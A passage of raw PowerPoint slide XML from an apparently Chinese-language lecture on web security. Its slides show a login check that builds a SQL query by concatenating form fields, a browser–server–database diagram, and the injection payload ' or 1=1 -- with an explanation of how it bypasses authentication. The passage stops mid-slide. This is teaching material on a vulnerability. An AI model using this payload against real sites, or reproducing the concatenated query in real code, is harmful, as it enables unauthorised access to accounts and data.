                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>&amp;  form(“user”)  &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>" ' </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>   AND   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>=' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> &amp; form(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”) &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“ '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="80000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>if not ok.EOF   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>		login success  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>else  fail;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>是否可以被利用？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1303557" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="2133600"/>
            <a:ext cx="228600" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ct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1" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3111500" y="1836738"/>
            <a:ext cx="1274763" cy="2406650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22532" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1836738"/>
            <a:ext cx="1395413" cy="2406650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>浏览器</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22533" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7412037" y="1836738"/>
            <a:ext cx="1274763" cy="2406650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1" dirty="0"/>
              <a:t>数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22534" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1833563" y="3016250"/>
            <a:ext cx="1298575" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22535" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1866900" y="4025900"/>
            <a:ext cx="1181100" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22536" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1814232" y="1811338"/>
            <a:ext cx="1338828" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>输入用户名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>密码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22537" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4386263" y="1981200"/>
            <a:ext cx="3025774" cy="1528624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SELECT * </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>FROM Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>WHERE user='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1234</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92172" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2847975" y="4525963"/>
            <a:ext cx="3052763" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" algn="ctr">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>正常的查询</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="C0C0C0"/>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4386263" y="3449817"/>
            <a:ext cx="3025774"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15" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="4386264" y="3808412"/>
            <a:ext cx="3059111"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bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="3581400"/>
            <a:ext cx="2438400" cy="422694"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="95000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="lg"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ahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1304578" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>恶意的输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1304579" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1447800"/>
            <a:ext cx="8305800" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>假设</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    user = “  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>or 1=1 --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(URL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>然后脚本执行为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ok = execute( SELECT … </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>			WHERE user= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> or 1=1  --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> … )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>会注释剩下的内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>导致后面的内容被忽略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>现在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ok.EOF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>始终是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
